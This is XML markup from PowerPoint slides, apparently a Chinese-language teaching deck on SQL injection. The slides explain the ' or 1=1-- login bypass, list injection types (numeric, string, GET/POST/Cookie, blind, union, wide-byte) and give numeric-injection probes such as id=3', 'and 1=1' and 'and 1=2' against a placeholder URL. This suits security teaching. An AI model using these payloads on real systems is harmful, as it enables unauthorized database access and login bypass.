          <p:cNvPr id="24" name="图片 23"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="142240" y="781685"/>
            <a:ext cx="6896100" cy="3851910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7133590" y="1485900"/>
            <a:ext cx="5017135" cy="1641475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>1、乘除的优先级高于加减；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2、同一优先级运算符从左向右执行；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>3、括号内的运算先执行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="4785995"/>
            <a:ext cx="11206480" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Select * from admin where username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="直接连接符 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4721225" y="5291455"/>
            <a:ext cx="2732405" cy="139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027670" y="5305425"/>
            <a:ext cx="18643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299700" y="5305425"/>
            <a:ext cx="750570" cy="177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902325" y="5426075"/>
            <a:ext cx="553085" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>真</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8682990" y="5426075"/>
            <a:ext cx="553085" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>假</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本框 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10398760" y="5426075"/>
            <a:ext cx="553085" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>真</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="直接连接符 33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4741545" y="5974715"/>
            <a:ext cx="6150610" cy="133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027670" y="5988050"/>
            <a:ext cx="553085" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>真</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="文本框 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5050790" y="6353175"/>
            <a:ext cx="6213475" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>语句为真，执行输入的语句，输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="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31" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="33" grpId="0"/>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27860" y="0"/>
            <a:ext cx="9648190" cy="781685"/>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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215687" y="9629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SQL注入类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2600960" y="781685"/>
            <a:ext cx="4498975" cy="5631180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>按变量类型分</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>数字型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>字符型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>按HTTP提交方式分</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>GET注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>POST注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>Cookie注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>按注入方式分</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>盲注</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>布尔盲注</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>时间盲注</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>错误盲注</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>union注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>编码问题</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>宽字节注入</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143125" y="214313"/>
            <a:ext cx="7886700" cy="933450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" kern="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>、数字型注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013460" y="1082675"/>
            <a:ext cx="10739755" cy="5561330"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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当输入的参数为整形时，如果存在注入漏洞，可以认为是</a:t>
            </a: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数字型注入</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测试步骤：</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a:t>
            </a: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单引号</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URL</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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.text.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="21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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>text.php?id</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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=3</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对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="21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id=3’ </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这时</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="21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语句</a:t>
            </a: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出错</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="21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，程序无法正常从数据库中查询出数据，就会抛出异常；</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A89C9818-A609-382C-2C37-050BF44D2D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1611185" y="3769487"/>
            <a:ext cx="4772152" cy="645414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7FF4D48-2D95-BBCC-893C-037F801C3ED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4788910"/>
            <a:ext cx="12033504" cy="13698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35B0CDD-E468-8671-5176-38580BA6F174}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="247457"/>
            <a:ext cx="10960608" cy="748923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1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and 1=1 </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,URL</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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.text.com/text.php?id=3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1" i="0" u="sng"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rPr>
              <a:t> and 1=1</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对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="18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id=3 and 1=1 </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语句执行</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1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正常</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，与原始页面无任何差异；</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED17FC2B-B3E9-831C-3AF1-389F515A534B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390144" y="3398662"/>
            <a:ext cx="11460480" cy="1405513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1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and 1=2</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URL</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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.text.com/text.php?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1" i="0" u="sng"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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1" i="0" u="sng"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rPr>
              <a:t> and 1=2</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对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="18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id=3 and 1=2 </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语句可以</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1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正常</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执行，但是无法查询出结果，所以返回数据与原始网页存在差异</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN"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endPar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11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6967059-4642-6353-DBA6-2B77003D6AFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2036064" y="1113170"/>
            <a:ext cx="6096000" cy="410308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2B2101B-0562-400E-8B1D-D755CF4AD3AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1912366" y="1640078"/>
            <a:ext cx="6305042" cy="1595252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F56A92E3-3636-1522-EFAB-148B8B0DB8D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560832" y="6312764"/>
            <a:ext cx="8985504" cy="581057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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如果满足以上三点，则可以判断该</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URL</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存在数字型注入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1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endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1" i="0" u="sng"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15" name="图片 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A22E0C1-F430-A2FB-0AA6-8C1E2EA038ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4109720" y="4176749"/>
            <a:ext cx="6142412" cy="536536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39F62B6E-3E8C-1F9C-0320-CFB8DD0F862B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
